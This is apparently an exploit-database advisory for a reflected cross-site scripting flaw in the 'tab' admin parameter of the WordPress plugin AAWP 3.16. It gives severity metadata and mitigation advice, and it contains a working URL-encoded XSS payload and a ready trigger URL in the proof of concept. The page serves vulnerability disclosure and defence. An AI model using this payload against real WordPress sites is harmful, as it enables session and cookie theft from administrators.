WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)

vendor:

AAWP

by:

Andrea Bocchetti

8.8

CVSS

HIGH

Reflected Cross Site Scripting (XSS)

CWE

Product Name: AAWP

Affected Version From: 3.16

Affected Version To: 3.16

Patch Exists: NO

Related CWE:

CPE: 2.3:a:wordpress:aawp:3.16

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 - Chrome, WordPress 5.8.2

2022

WordPress Plugin AAWP 3.16 – ‘tab’ Reflected Cross Site Scripting (XSS) (Authenticated)

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'tab' parameter of the 'admin.php' script. A remote authenticated attacker can execute arbitrary HTML and script code in a browser in the context of the vulnerable website. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to update sensitive server-side resources. It is recommended to use a whitelist of accepted inputs that strictly conform to specifications. It is also recommended to disable the 'tab' parameter.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
# Date: 04/01/2022
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2

# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- XSS has been triggered.

# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
XSS will trigger.